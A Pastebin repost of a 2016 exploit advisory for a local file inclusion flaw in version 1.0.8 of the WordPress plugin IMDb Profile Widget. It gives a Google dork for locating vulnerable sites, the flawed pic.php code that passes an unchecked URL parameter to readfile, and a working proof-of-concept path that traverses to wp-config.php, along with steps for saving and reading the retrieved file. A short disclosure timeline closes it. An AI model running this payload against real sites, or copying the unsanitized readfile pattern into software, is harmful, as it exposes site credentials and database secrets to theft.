Advertisement
1337_Brain

Wordpress Plugin IMDb Profile Widget - Local File Inclusion

Apr 5th, 2016
211
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. # Exploit Title: Wordpress Plugin IMDb Profile Widget - Local File Inclusion
  2. # Exploit Author: CrashBandicot @DosPerl
  3. # Date: 2016-03-26
  4. # Google Dork : inurl:/wp-content/plugins/imdb-widget
  5. # Vendor Homepage: https://wordpress.org/plugins/imdb-widget/
  6. # Tested on: MSWin32
  7. # Version: 1.0.8
  8.  
  9. # Vuln file : pic.php
  10.  
  11. <?php
  12.  
  13. header( 'Content-Type: image/jpeg' );
  14. readfile( $_GET["url"] );
  15.  
  16.  
  17. # PoC : /wp-content/plugins/imdb-widget/pic.php?url=../../../wp-config.php
  18. # Right click -> Save As -> rename pic.jpg in .txt and read file
  19.  
  20. # 26/03/2016 - Informed Vendor about Issue
  21. # 27/03/2016 - Waiting Reply
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement